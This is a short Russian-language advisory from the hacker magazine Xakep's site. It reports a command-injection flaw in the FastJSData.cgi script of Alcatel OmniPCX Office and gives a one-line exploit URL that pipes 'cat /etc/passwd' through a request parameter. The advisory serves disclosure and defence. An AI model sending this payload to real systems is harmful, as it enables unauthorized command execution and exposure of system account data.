Выполнение произвольных команд в Alcatel OmniPCX Office

Рекомендуем почитать:

Xakep #295. Приемы рыбалки

Содержание выпуска
Подписка на «Хакер»-60%

Программа: Alcatel OmniPCX Office 210/061.1

Уязвимость позволяет удаленному пользователю выполнить произвольные команды
на целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных сценарием FastJSData.cgi. Удаленный пользователь может выполнить
произвольные команды на целевой системе.

Эксплоит:

http://[server]/cgi-data/FastJSData.cgi?id1=sh2kerr&id2=91|cat%20/etc/passwd

Выполнение произвольных команд в Alcatel OmniPCX Office

Xakep #295. Приемы рыбалки

Подпишись на наc в Telegram!

Из рубрики «Взлом»

MEGANews. Самые важные события в мире инфосека за ноябрь

Tunnels Nightmare. Используем провайдерские протоколы для пивотинга

HTB Pilgrimage. Повышаем привилегии через уязвимость в Binwalk

Абьюз сессий Windows по-новому. Получаем билеты TGT методом GIUDA

Трюки

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Инструменты разведчика. Извлекаем данные из Instagram, Telegram, GitHub и других источников

Письмо с сюрпризом. Изучаем уловки и хитрости для доставки писем с малварью

Последние новости

Вымогатель Cactus использует уязвимости в Qlik Sense для проникновения в сети

Проблемы LogoFAIL позволяют внедрять UEFI-буткиты через картинки

WhatsApp защитит закрытые чаты с помощью секретных кодов

Хакеры из Black Basta «заработали» 100 млн долларов на вымогательстве

Zyxel патчит критические баги в межсетевых экранах, точках доступа и NAS